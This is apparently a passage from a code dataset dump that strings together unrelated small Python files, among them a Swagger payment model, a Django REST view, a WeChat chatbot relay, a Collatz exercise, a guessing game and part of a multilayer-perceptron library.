import PaymentAddresses # noqa: F401,E501\nfrom bleumi_pay.models.payment_balances import PaymentBalances # noqa: F401,E501\n\n\nclass Payment(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'str',\n 'addresses': 'PaymentAddresses',\n 'balances': 'PaymentBalances',\n 'created_at': 'int',\n 'updated_at': 'int'\n }\n\n attribute_map = {\n 'id': 'id',\n 'addresses': 'addresses',\n 'balances': 'balances',\n 'created_at': 'createdAt',\n 'updated_at': 'updatedAt'\n }\n\n def __init__(self, id=None, addresses=None, balances=None, created_at=None, updated_at=None): # noqa: E501\n \"\"\"Payment - a model defined in Swagger\"\"\" # noqa: E501\n self._id = None\n self._addresses = None\n self._balances = None\n self._created_at = None\n self._updated_at = None\n self.discriminator = None\n self.id = id\n self.addresses = addresses\n self.balances = balances\n self.created_at = created_at\n self.updated_at = updated_at\n\n @property\n def id(self):\n \"\"\"Gets the id of this Payment. # noqa: E501\n\n Unique ID identifying the payment; specified when it was created by your system # noqa: E501\n\n :return: The id of this Payment. # noqa: E501\n :rtype: str\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this Payment.\n\n Unique ID identifying the payment; specified when it was created by your system # noqa: E501\n\n :param id: The id of this Payment. # noqa: E501\n :type: str\n \"\"\"\n if id is None:\n raise ValueError(\"Invalid value for `id`, must not be `None`\") # noqa: E501\n\n self._id = id\n\n @property\n def addresses(self):\n \"\"\"Gets the addresses of this Payment. # noqa: E501\n\n\n :return: The addresses of this Payment. # noqa: E501\n :rtype: PaymentAddresses\n \"\"\"\n return self._addresses\n\n @addresses.setter\n def addresses(self, addresses):\n \"\"\"Sets the addresses of this Payment.\n\n\n :param addresses: The addresses of this Payment. # noqa: E501\n :type: PaymentAddresses\n \"\"\"\n if addresses is None:\n raise ValueError(\"Invalid value for `addresses`, must not be `None`\") # noqa: E501\n\n self._addresses = addresses\n\n @property\n def balances(self):\n \"\"\"Gets the balances of this Payment. # noqa: E501\n\n\n :return: The balances of this Payment. # noqa: E501\n :rtype: PaymentBalances\n \"\"\"\n return self._balances\n\n @balances.setter\n def balances(self, balances):\n \"\"\"Sets the balances of this Payment.\n\n\n :param balances: The balances of this Payment. # noqa: E501\n :type: PaymentBalances\n \"\"\"\n if balances is None:\n raise ValueError(\"Invalid value for `balances`, must not be `None`\") # noqa: E501\n\n self._balances = balances\n\n @property\n def created_at(self):\n \"\"\"Gets the created_at of this Payment. # noqa: E501\n\n UNIX timestamp when the payment was created # noqa: E501\n\n :return: The created_at of this Payment. # noqa: E501\n :rtype: int\n \"\"\"\n return self._created_at\n\n @created_at.setter\n def created_at(self, created_at):\n \"\"\"Sets the created_at of this Payment.\n\n UNIX timestamp when the payment was created # noqa: E501\n\n :param created_at: The created_at of this Payment. 
# noqa: E501\n :type: int\n \"\"\"\n if created_at is None:\n raise ValueError(\"Invalid value for `created_at`, must not be `None`\") # noqa: E501\n\n self._created_at = created_at\n\n @property\n def updated_at(self):\n \"\"\"Gets the updated_at of this Payment. # noqa: E501\n\n UNIX timestamp when the lastest operation was performed # noqa: E501\n\n :return: The updated_at of this Payment. # noqa: E501\n :rtype: int\n \"\"\"\n return self._updated_at\n\n @updated_at.setter\n def updated_at(self, updated_at):\n \"\"\"Sets the updated_at of this Payment.\n\n UNIX timestamp when the lastest operation was performed # noqa: E501\n\n :param updated_at: The updated_at of this Payment. # noqa: E501\n :type: int\n \"\"\"\n if updated_at is None:\n raise ValueError(\"Invalid value for `updated_at`, must not be `None`\") # noqa: E501\n\n self._updated_at = updated_at\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(Payment, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Payment):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"bleumi_pay/models/payment.py","file_name":"payment.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"646668860","text":"import typing as t\nimport os\n\ndef hello(*, name: str = \"world\"):\n print(f\"hello {name}\")\n\n\ndef byebye(name):\n print(f\"byebye {name}\")\n\n\nif __name__ == \"__main__\":\n pass\n\n\ndef main(argv: t.Optional[t.List[str]] = None) -> t.Any:\n import argparse\n\n parser = argparse.ArgumentParser(formatter_class=type('_HelpFormatter', (argparse.ArgumentDefaultsHelpFormatter, argparse.RawTextHelpFormatter), {}))\n parser.print_usage = parser.print_help # type: ignore\n subparsers = parser.add_subparsers(title='subcommands', dest='subcommand')\n subparsers.required = True\n\n fn = hello\n sub_parser = subparsers.add_parser(fn.__name__, help=fn.__doc__, formatter_class=parser.formatter_class)\n sub_parser.print_usage = sub_parser.print_help # type: ignore\n sub_parser.add_argument('--name', required=False, default='world', help='-')\n sub_parser.set_defaults(subcommand=fn)\n\n fn = byebye # type: ignore\n sub_parser = subparsers.add_parser(fn.__name__, help=fn.__doc__, formatter_class=parser.formatter_class)\n sub_parser.print_usage = sub_parser.print_help # type: ignore\n sub_parser.add_argument('name', help='-')\n sub_parser.set_defaults(subcommand=fn)\n\n args = parser.parse_args(argv)\n params = vars(args).copy()\n action = 
params.pop('subcommand')\n if bool(os.getenv(\"FAKE_CALL\")):\n from inspect import getcallargs\n from functools import partial\n action = partial(getcallargs, action)\n return action(**params)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"examples/multi-command/04if-name-main/_expose.py","file_name":"_expose.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"53400112","text":"# !/usr/bin/env python\n# -*- coding:utf8 -*-\n\n__author__ = \"Phtaus\"\n__email__ = \"chenqicong@cnnic.cn\"\n__copyright__ = \"Copyright 2016, Niot\"\n__version__ = \"1.0.0\"\n__deprecated__ = False\n__date__ = \"2016-3-30 09:21:01\"\n\nimport os.path\nimport urllib\nimport urllib2\nimport json\n\nfrom ..web.modules import WisagrSysApk\nfrom ..web.lib import EnumStatus\n\ndef app_version(req):\n\t\"\"\"Get the latest app client version\n\tAccording to the version code, query the latest version information to\n\tuser app client.\n\n\treturn:\n\t\tstatus: the sign of result\n\t\t\t\t0 stand from the operated is success\n\t\t\t\t9 stand for the operated is failed\n\t\tversion_info: the information for the latest user app client\n\t\"\"\"\n\n\t# the sql which to query the latest version information\n\tres = EnumStatus()\n\tif 'platform' in req and req['platform'] == 'ios':\n\t\tplatform = req['platform']\n\telse:\n\t\tplatform = 'android'\n\n\tapk_info = WisagrSysApk.get_lastest_ver(platform)\n\n\tif apk_info:\n\t\tif apk_info.version_name is None:\n\t\t\turl = 'https://itunes.apple.com/lookup'\n\t\t\tpara_dict = {'id':'976509986'}\n\t\t\tpara_data = urllib.urlencode(para_dict)\n\t\t\tios_update = urllib2.urlopen(url, para_data)\n\t\t\tresult = json.loads(ios_update.read())\n\t\t\tresults = result['results'][0]\n\t\t\tversion_name = apk_info.version_name = results['version']\n\t\t\tversion_code = apk_info.version_code\n\t\t\tdescription = apk_info.description = results['releaseNotes']\n\t\t\tpath = apk_info.path = results['trackViewUrl']\n\t\t\tapk_info.platform = 'ios'\n\t\t\tmin_compatible_version = apk_info.min_compatible_version\n\t\telse:\n\t\t\t# if platform == 'android':\n\t\t\t# \tpath = os.path.join(os.path.sep, apk_info.path, apk_info.name)\n\t\t\t# else:\n\t\t\tpath = apk_info.path\n\t\t\tversion_code = apk_info.version_code\n\t\t\tdescription = apk_info.description\n\t\t\tmin_compatible_version = apk_info.min_compatible_version\n\t\t\tversion_name = apk_info.version_name\n\n\t\tres.resJson(res.SUCCESS, {\n\t\t\t\"version_code\": version_code,\n\t\t\t\"version_name\": version_name,\n\t\t\t\"version_url\": path,\n\t\t\t\"description\": description,\n\t\t\t\"min_compatible_version\": min_compatible_version\n\t\t})\n\n\treturn res.RES\n","sub_path":"cn/app/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"143526376","text":"from big_ol_pile_of_manim_imports import *\r\n\r\nclass diferencia(Scene): \r\n def construct(self): \r\n tit = TextMobject(\"asd\")\r\n tit.scale(.85)\r\n symbol = TextMobject(\"?\")\r\n symbol.scale(.85)\r\n\r\n subt1 = TextMobject(\"Normal\")\r\n subt1.scale(.85)\r\n subt2 = TextMobject(\"Aplicativo\")\r\n subt2.scale(.85)\r\n\r\n tit.to_edge(UP)\r\n subt1.move_to(tit.get_center()+(DOWN*1.5)+(RIGHT*4.5))\r\n subt2.move_to(tit.get_center()+(DOWN*1.5)+(LEFT*4.5))\r\n subt1.set_color(\"#2EFF00\") #VERDE\r\n subt2.set_color(\"#19C4FF\") #AZUL\r\n arrow = 
DoubleArrow(subt2.get_right(),subt1.get_left(),buff=.1)\r\n        symbol.move_to(arrow.get_center())\r\n\r\n        self.wait(2)\r\n        self.play(Write(subt1),Write(subt2),Write(symbol))\r\n        looper = TexMobject(r\"(\\lambda x.(x\\quad x)\\quad \\lambda x.(x\\quad x))\")\r\n        looper.scale(.9)\r\n        looper.next_to(symbol,DOWN,buff=1.5)\r\n\r\n        self.wait(2)\r\n        self.play(\r\n            Transform(symbol,looper)\r\n        )\r\n\r\n        self.wait(2)\r\n        text1 = TextMobject(\"$loop!$\")\r\n        text2 = TextMobject(\"$y$\")\r\n        text1.scale(.9)\r\n        text2.scale(.9)\r\n        text1.next_to(subt2,DOWN,buff=1.5)\r\n        text2.next_to(subt1,DOWN,buff=1.5)\r\n        text1.set_color(\"#19C4FF\")\r\n        text2.set_color(\"#2EFF00\")\r\n        self.play(Write(text1))\r\n        self.wait(2)\r\n        self.play(Write(text2))\r\n        self.wait(3)","sub_path":"diferencia.py","file_name":"diferencia.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
{"seq_id":"541921826","text":"def main():\n    from time import sleep\n    from random import randint\n    \n    rn = randint(0, 9)\n    \n    ui = input(\"What is your name? \")\n    sleep(0.1)\n    print(\"hi, \" + ui)\n    sleep(0.5)\n    print(\"Let's play a game.\")\n    sleep(0.1)\n    print(\"I'll think of a number between zero and nine, inclusive.\")\n    sleep(0.1)\n    print(\"Your goal is to guess that number in three attempts.\")\n    # print(rn)  # debug leftover: printing rn would reveal the secret number\n    sleep(0.4)\n\n    msg = [\"Take a guess. \", \"Guess again. \", \"Take another guess. \"]\n\n    end = False\n    i = 0\n    guesses = 0\n    while not end:\n        if guesses < 3:\n            sleep(0.1)\n            ui = input(msg[i])\n            i = randint(1, len(msg) - 1)\n            try:\n                ui = int(ui)\n                if rn == ui:\n                    print(\"Correct! Goodbye.\")\n                    sleep(0.1)\n                    break\n                else:\n                    if ui < rn:\n                        print(\"More.\")\n                    else:\n                        print(\"Less.\")\n                    guesses += 1\n            except ValueError:  # int() raises ValueError on non-numeric input\n                print(\"That's not a valid number.\")\n        else:\n            print(\"You are out of guesses. 
goodbye.\")\n exit()\nmain()\n","sub_path":"xyz.py","file_name":"xyz.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"230944944","text":"# Create your views here.\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\nfrom wildapp.models import WildApp\nfrom wildapp.serializers import WildAppSerializer\n\n\n@api_view(['GET', 'POST', 'DELETE'])\ndef wp_list(request):\n if request.method == 'GET':\n wps = WildApp.objects.all()\n serializer = WildAppSerializer(wps, many=True)\n return Response(serializer.data)\n if request.method == 'POST':\n serializer = WildAppSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n if request.method == 'DELETE':\n data = WildApp.objects.last()\n data.delete()\n return Response(serializer.data)\n\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['GET'])\ndef wp_selected(request,pk):\n if request.method == 'GET':\n wps = WildApp.objects.filter(species=pk)\n serializer = WildAppSerializer(wps, many=True)\n return Response(serializer.data)\n","sub_path":"wildapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"148873840","text":"import os,sys\nimport pygame\nimport numpy as np\n \nfrom pygame.locals import *\n\nBLACK=(0,0,0)\nWHITE = (255, 255, 255)\n\ndone=False\n\ntry:\n pygame.init()\nexcept:\n print(\"O modulo pygame não foi inicializado/instalado corretamente\")\n\n\n\ndef create_point(surface,list_pos):\n for ii in list_pos:\n print(ii)\n pygame.draw.circle(surface, BLACK, ii , 5)\n\n\nscreen = pygame.display.set_mode((500,500))\npygame.display.set_caption('Boids')\npygame.mouse.set_visible(0)\n\nlist_pos = np.random.randint(400, size=(100,2))\n\nscreen.fill(WHITE)\ncreate_point(screen,list_pos) \npygame.display.flip()\n\nwhile not done:\n for event in pygame.event.get():\n if event.type == QUIT:\n done=True\n\n\n \n","sub_path":"boids.py","file_name":"boids.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"156643604","text":"from wxpy import *\nimport json\nimport requests\n\n\nbot = Bot()\nbot = Bot(cache_path = True)\n\ndef auto_reply(text):\n url = \"http://www.tuling123.com/openapi/api\"\n api_key = \"87f4c0f17b2345febf740b9048c14b34\"\n payload = {\n \"key\": api_key,\n \"info\": text,\n }\n r = requests.post(url, data=json.dumps(payload))\n result = json.loads(r.content)\n return \"[来自,,,,] \" + result[\"text\"]\n \n@bot.register()\ndef forward_message(msg):\n return auto_reply(msg.text)\n\nembed()\n","sub_path":"wxpy.py","file_name":"wxpy.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"591177111","text":"# LABORATORIO\n\n# Tiempo estimado\n\n# 20 minutos\n# Nivel de dificultad\n\n# Media\n# Objetivos\n\n# Familiarizar al estudiante con:\n\n# Utilizar el ciclo while.\n# Convertir ciclos definidos verbalmente en código de Python real.\n\n# Escenario\n\n# En 1937, un matemático alemán llamado Lothar Collatz formuló una hipótesis intrigante (aún no se ha comprobado) que se puede describir de la siguiente manera:\n\n# Toma 
cualquier número entero que no sea negativo y que no sea cero y asígnale el nombre c0.\n# Si es par, evalúa un nuevo c0 como c0 ÷ 2.\n# De lo contrario, si es impar, evalúe un nuevo c0 como 3 × c0 + 1.\n# Si c0 ≠ 1, salta al punto 2.\n\n# La hipótesis dice que, independientemente del valor inicial de c0, el valor siempre tiende a 1.\n\n# Por supuesto, es una tarea extremadamente compleja usar una computadora para probar la hipótesis de cualquier número natural (incluso puede requerir inteligencia artificial), pero puede usar Python para verificar algunos números individuales. Tal vez incluso encuentres el que refutaría la hipótesis.\n\n# Escribe un programa que lea un número natural y ejecute los pasos anteriores siempre que c0 sea diferente de 1. También queremos que cuente los pasos necesarios para lograr el objetivo. Tu código también debe mostrar todos los valores intermedios de c0.\n\n# Sugerencia: la parte más importante del problema es como transformar la idea de Collatz en un ciclo while- esta es la clave del éxito.\n\n# Prueba tu código con los datos que hemos proporcionado.\n# Datos de prueba\n\n# Entrada de muestra: 15\n\n# Salida esperada:\n# 46\n# 23\n# 70\n# 35\n# 106\n# 53\n# 160\n# 80\n# 40\n# 20\n# 10\n# 5\n# 16\n# 8\n# 4\n# 2\n# 1\n# pasos = 17\n\n# Entrada de muestra: 16\n\n# Salida esperada:\n# 8\n# 4\n# 2\n# 1\n# pasos = 4\n\n# Entrada de muestra: 1023\n\n# Salida esperada:\n# 3070\n# 1535\n# 4606\n# 2303\n# 6910\n# 3455\n# 10366\n# 5183\n# 15550\n# 7775\n# 23326\n# 11663\n# 34990\n# 17495\n# 52486\n# 26243\n# 78730\n# 39365\n# 118096\n# 59048\n# 29524\n# 14762\n# 7381\n# 22144\n# 11072\n# 5536\n# 2768\n# 1384\n# 692\n# 346\n# 173\n# 520\n# 260\n# 130\n# 65\n# 196\n# 98\n# 49\n# 148\n# 74\n# 37\n# 112\n# 56\n# 28\n# 14\n# 7\n# 22\n# 11\n# 34\n# 17\n# 52\n# 26\n# 13\n# 40\n# 20\n# 10\n# 5\n# 16\n# 8\n# 4\n# 2\n# 1\n# pasos = 62\n\nc0 = int (input(\"Ingrese c0:\"))\n\nif c0 > 1:\n pasos = 0\n while c0 != 1:\n if c0 % 2 != 0:\n cnew = 3 * c0 + 1\n else:\n cnew = c0 // 2\n print(c0)\n c0 = cnew\n pasos += 1\n print(\"pasos =\", pasos)\nelse:\n print(\"Valor de c0 incorrecto\")","sub_path":"curso-python/lab/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338427797","text":"###############################################################################\n# The MIT License (MIT)\n#\n# Copyright (c) 2017 Justin Lovinger\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n###############################################################################\n\nimport random\nimport copy\nimport functools\nimport operator\n\nimport numpy\n\nfrom learning import calculate, optimize\nfrom learning import Model, LinearTransfer, ReluTransfer, MeanSquaredError\nfrom learning.transfer import Transfer\nfrom learning.optimize import Problem, SteepestDescent\n\nINITIAL_WEIGHTS_RANGE = 0.25\n\n\n# TODO: Add support for penalty functions\nclass MLP(Model):\n \"\"\"MultiLayer Perceptron\n\n Args:\n shape: Number of inputs, followed by number of outputs of each layer.\n Shape of each weight matrix is given by sequential pairs in shape.\n transfers: Optional. List of transfer layers.\n Can be given as a single transfer layer to easily define output transfer.\n Defaults to ReLU hidden followed by linear output.\n optimizer: Optimizer; Optimizer used to optimize weight matrices.\n error_func: ErrorFunc; Error function for optimizing weight matrices.\n jacobian_norm_break: Training will end if objective gradient norm\n is less than this value.\n \"\"\"\n\n def __init__(self,\n shape,\n transfers=None,\n optimizer=None,\n error_func=None,\n jacobian_norm_break=1e-10):\n super(MLP, self).__init__()\n\n if transfers is None:\n transfers = [ReluTransfer() for _ in range((len(shape) - 2))\n ] + [LinearTransfer()]\n elif isinstance(transfers, Transfer):\n # Treat single given transfer as output transfer\n transfers = [ReluTransfer()\n for _ in range((len(shape) - 2))] + [transfers]\n\n if len(transfers) != len(shape) - 1:\n raise ValueError(\n 'Must have exactly 1 transfer between each pair of layers, and after the output'\n )\n\n self._shape = shape\n\n self._bias_vec = self._random_weight_matrix(\n shape[1]) # Number of outputs of first layer\n self._weight_matrices = []\n self._setup_weight_matrices()\n self._transfers = transfers\n\n # Parameter optimization for training\n if optimizer is None:\n optimizer = optimize.make_optimizer(\n sum([\n reduce(operator.mul, weight_matrix.shape)\n for weight_matrix in self._weight_matrices\n ]))\n\n self._optimizer = optimizer\n\n # Error function for training\n if error_func is None:\n error_func = MeanSquaredError()\n self._error_func = error_func\n\n # Convergence criteria\n self._jacobian_norm_break = jacobian_norm_break\n\n # Activation vectors\n # 1 for input, then 2 for each hidden and output (1 for transfer, 1 for perceptron))\n # To help with jacobian calculation\n self._weight_inputs = [None]*(len(self._shape))\n self._transfer_inputs = [None]*(len(self._shape)-1)\n\n self.reset()\n\n def _setup_weight_matrices(self):\n \"\"\"Initialize weight matrices.\"\"\"\n self._weight_matrices = []\n num_inputs = self._shape[0]\n for num_outputs in self._shape[1:]:\n self._weight_matrices.append(\n self._random_weight_matrix((num_inputs, num_outputs)))\n num_inputs = num_outputs\n\n def _random_weight_matrix(self, shape):\n \"\"\"Return a random weight matrix.\"\"\"\n # TODO: Random weight matrix should be a function user can pass in\n return (2 * numpy.random.random(shape) - 1) * INITIAL_WEIGHTS_RANGE\n\n def reset(self):\n \"\"\"Reset this model.\"\"\"\n super(MLP, self).reset()\n\n self._setup_weight_matrices()\n self._bias_vec = self._random_weight_matrix(self._shape[1])\n\n 
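# Freshly drawn weights invalidate any state the optimizer may have\n        # accumulated (momentum, step-size history, etc.), so reset it as well.\n        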
self._optimizer.reset()\n\n def activate(self, input_tensor):\n \"\"\"Return the model outputs for given input_tensor.\"\"\"\n # Make sure input_tensor is a numpy array, for consistency\n if not isinstance(input_tensor, numpy.ndarray):\n input_tensor = numpy.array(input_tensor)\n\n try:\n if input_tensor.shape[-1] != self._shape[0]:\n raise ValueError('input_tensor attributes == %s, expected %s' %\n (input_tensor.shape[-1], self._shape[0]))\n except AttributeError: # Not numpy array\n # Do not check shape\n pass\n\n self._weight_inputs[0] = input_tensor\n # First part includes bias vector\n self._transfer_inputs[0] = numpy.dot(\n self._weight_inputs[0], self._weight_matrices[0]) + self._bias_vec\n self._weight_inputs[1] = self._transfers[0](self._transfer_inputs[0])\n\n for i, (weight_matrix, transfer_func) in list(\n enumerate(zip(self._weight_matrices, self._transfers)))[1:]:\n # Track all activations for learning, and layer inputs\n self._transfer_inputs[i] = numpy.dot(self._weight_inputs[i],\n weight_matrix)\n self._weight_inputs[i + 1] = transfer_func(\n self._transfer_inputs[i])\n\n # Return activation of the only layer that feeds into output\n return numpy.copy(self._weight_inputs[-1])\n\n def train_step(self, input_matrix, target_matrix):\n \"\"\"Adjust the model towards the targets for given inputs.\n\n Train on a mini-batch.\n \"\"\"\n error, flat_weights = self._optimizer.next(\n Problem(\n obj_func=\n lambda xk: self._get_obj(xk, input_matrix, target_matrix),\n obj_jac_func=\n lambda xk: self._get_obj_jac(xk, input_matrix, target_matrix)),\n _flatten(self._bias_vec, self._weight_matrices))\n self._bias_vec, self._weight_matrices = _unflatten_weights(\n flat_weights, self._shape)\n\n self.converged = self._optimizer.jacobian is not None and numpy.linalg.norm(\n self._optimizer.jacobian) < self._jacobian_norm_break\n return error\n\n def _post_train(self, input_matrix, target_matrix):\n \"\"\"Call after Model.train.\n\n Optional.\n \"\"\"\n # Reset optimizer, because problem may change on next train call\n self._optimizer.reset()\n\n ######################################\n # Helper functions for optimizer\n ######################################\n def _get_obj(self, parameter_vec, input_matrix, target_matrix):\n \"\"\"Helper function for Optimizer to get objective value.\"\"\"\n self._bias_vec, self._weight_matrices = _unflatten_weights(\n parameter_vec, self._shape)\n return self._error_func(self.activate(input_matrix), target_matrix)\n\n\n def _get_obj_jac(self, parameter_vec, input_matrix, target_matrix):\n \"\"\"Helper function for Optimizer to get objective value and derivative.\"\"\"\n self._bias_vec, self._weight_matrices = _unflatten_weights(\n parameter_vec, self._shape)\n # Return error and flattened jacobians\n return (lambda obj, vec, jac: (obj, _flatten(vec, jac)))(\n *self._get_jacobians(input_matrix, target_matrix))\n\n ######################################\n # Objective Derivative\n ######################################\n def _get_jacobians(self, input_matrix, target_matrix):\n \"\"\"Return overall error, bias jacobian, and jacobian matrix for each weight matrix.\"\"\"\n # Calculate derivative with regard to each weight matrix\n # d/dW_n e(MLP(X), Y) = f_{n-1}(...(f_1(X W_1 + b)...)W_{n-1}) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)\n # d/dW_{n-1} e(MLP(X), Y) = f_{n-2}(...(f_1(X W_1 + b)...)W_{n-2}) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n) W_n^T f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1})\n # ...\n # d/dW_1 
e(MLP(X), Y) = X e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n) W_n^T f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) ... W_2^T f_1(X W_1 + b)\n # d/db e(MLP(X), Y) = \\vec{1}^T e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n) W_n^T f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) ... W_2^T f_1(X W_1 + b)\n\n # We can re-arrange above derivatives for clarity\n # HOWEVER, because matrix operations are non-commutative\n # the re-arranged derivatives are not correct for implementation\n # NOTE (WARNING): Below is not accurate\n # and is only provided to clarify variables involved\n # d/dw_n e(MLP(X), Y) = f_{n-1}(...(f_1(X W_1 + b)...)W_{n-1}) f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n # d/dw_{n-1} e(MLP(X), Y) = W_n f_{n-2}(...(f_1(X W_1 + b)...)W_{n-2}) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n # ...\n # d/dw_1 e(MLP(X), Y) = X W_2 ... W_n f_1'(X W_1 + b) ... f_2'(f_1(X W_1 + b)W_2) ... f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n # d/db e(MLP(X), Y) = \\vec{1}^T W_2 ... W_n f_1'(X W_1 + b) ... f_2'(f_1(X W_1 + b)W_2) ... f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n\n output_matrix = self.activate(input_matrix)\n\n # Error and error derivative: e'(mlp(X), Y) = e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n error, error_jac = self._error_func.derivative(output_matrix,\n target_matrix)\n\n # Calculate a series of partial jacobians (from d/dW_n to d/dW_1).\n # These jacobians include everything except the final f_{i-1}(...(f_1(X W_1 + b)...)W_{i-1}) (or X for d/W_1)\n # multiplication with partial jacobian corresponding to d/dW_i\n # For d/dW_n: e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)\n # For d/dW_{n-1}: ((e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)) W_n^T) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1})\n # For d/dW_{n-2}: (((e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)) W_n^T) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) W_{n-1}^T) f_{n-2}(...(f_1(X W_1 + b)...)W_{n-2})\n # ...\n # For d/dW_1: ((((e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)) W_n^T) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) ... ) W_2^T) f_1'(X W_1 + b)\n\n # TODO: Add optimization for cross entropy and softmax output (just o - t)\n # Derivative of error_vec w.r.t. 
output transfer\n        partial_jacobians = [\n            _dot_diag_or_matrix(error_jac, self._transfers[-1].derivative(\n                self._transfer_inputs[-1], self._weight_inputs[-1]))\n        ]\n        # list() is needed because zip returns a one-shot iterator on Python 3,\n        # which reversed() cannot consume directly\n        for weight_matrix, transfer_func, transfer_inputs, weight_inputs in reversed(\n                list(zip(self._weight_matrices[1:], self._transfers[:-1],\n                         self._transfer_inputs[:-1], self._weight_inputs[1:]))):\n            partial_jacobians.append(\n                _dot_diag_or_matrix(partial_jacobians[-1].dot(weight_matrix.T),\n                                    transfer_func.derivative(\n                                        transfer_inputs, weight_inputs)))\n        # Reverse so partial_jacobians[0] corresponds to d/dW_1\n        partial_jacobians = list(reversed(partial_jacobians))\n\n        # Finalize jacobian for each weight matrix\n        # by multiplying final f_{i-1}(...(f_1(X W_1 + b)...)W_{i-1}) (or X for d/W_1)\n        # with partial jacobian corresponding to d/dW_i\n        # NOTE: self._weight_inputs[-1] is model output\n        assert len(self._weight_inputs) - 1 == len(partial_jacobians)\n        jacobians = [\n            